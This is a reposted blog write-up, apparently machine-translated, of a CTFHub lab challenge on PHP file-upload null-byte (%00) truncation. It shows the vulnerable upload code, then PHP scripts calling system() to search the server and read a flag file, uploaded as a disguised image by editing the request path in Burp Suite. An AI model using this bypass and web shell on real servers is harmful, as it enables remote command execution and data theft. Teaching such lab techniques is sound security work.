当前位置:网站首页>PHP file upload 00 truncation

PHP file upload 00 truncation

2022-06-26 15:11:00 Yale letter

0x00,%00,/00 Or something , It's the same thing , It's just a different form of expression . Like a girlfriend 、 Woman ticket .

On website url in ,%00 Will be decoded into 0, And in the ascii in ,0 It's a special character ( Not characters '0'), Indicates the end of the string , So if url In the %00, It means that the decoding is completed .

Such as :

https://www.yalexin/?file=test.txt

Now the output is test.txt

If replaced :

https://www.yalexin/?file=test.php%00.txt

At this time, the output is test.php

Let's look at an example :

ctfhub The skill tree -web- Upload files -00 truncation

After opening the scene, there is a page for uploading files , Look at the source code as follows :

<script>alert(' Upload successful ')</script><!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <title>CTFHub  Upload files  - 00 truncation </title>
</head>

<body>
    <h1>CTFHub  Upload files  - 00 truncation </h1>
    <form action=?road=/var/www/html/upload/ method="post" enctype="multipart/form-data">
        <label for="file">Filename:</label>
        <input type="file" name="file" id="file" />
        <br />
        <input type="submit" name="submit" value="Submit" />
    </form>
<!--
if (!empty($_POST['submit'])) {
    $name = basename($_FILES['file']['name']);
    $info = pathinfo($name);
    $ext = $info['extension'];
    $whitelist = array("jpg", "png", "gif");
    if (in_array($ext, $whitelist)) {
        $des = $_GET['road'] . "/" . rand(10, 99) . date("YmdHis") . "." . $ext;
        if (move_uploaded_file($_FILES['file']['tmp_name'], $des)) {
            echo "<script>alert(' Upload successful ')</script>";
        } else {
            echo "<script>alert(' Upload failed ')</script>";
        }
    } else {
        echo " File type mismatch ";
    }
}
-->
</body>

</html>

You can see in the source code , First, check whether the file type is in the white list ( That is, only picture types can be uploaded ), After the file type passes , analysis road Parameter values , Then a random number and date are spliced as the file name and uploaded to the specified directory .

After a simple analysis , Probably know the idea : Using agents , Write a php Script , Change its extension to picture type , Then intercept the data packet 、 Modify the data package , Visit the script we uploaded .

In the first place to find flag Possible locations :

<?php

system('find / | grep flag')

?>

Save its file as hack.png

Then turn on the agent , open Burp Suite Software , And put the interceptor (intercept) open

Upload what we just did in the browser hack.png

And then we'll be in Burp See the datagram in , We try to 

POST /?road=/var/www/html/upload/ HTTP/1.1

Change it to :

POST /?road=/var/www/html/upload/hack.php%00 HTTP/1.1

And then click forward

After uploading successfully , We access the script :

/upload/hack.php

Sure enough, I saw something :

/sys/devices/platform/serial8250/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/pci0000:00/0000:00:03.0/virtio0/net/eth0/flags /sys/devices/virtual/net/lo/flags /sys/devices/virtual/net/dummy0/flags /sys/module/scsi_mod/parameters/default_dev_flags /proc/kpageflags /usr/lib/perl/5.14.2/auto/POSIX/SigAction/flags.al /usr/lib/perl/5.14.2/bits/waitflags.ph /var/www/html/flag_139938352.php

The last is what we want . To read the file .

Modify our script hack.php

<?php

system('cat ../flag_139938352.php')// Be careful , The script will eventually be uploaded to /var/www/html/upload  Under the folder , Therefore, go back to the upper level directory to read  flag

?>

You can read the content by continuing to upload according to the method just described ( Be careful : We visit hack.php You will encounter blank pages , Right click to view the source code flag).

原网站

版权声明
本文为[Yale letter]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/177/202206261451204535.html

边栏推荐

猜你喜欢

随机推荐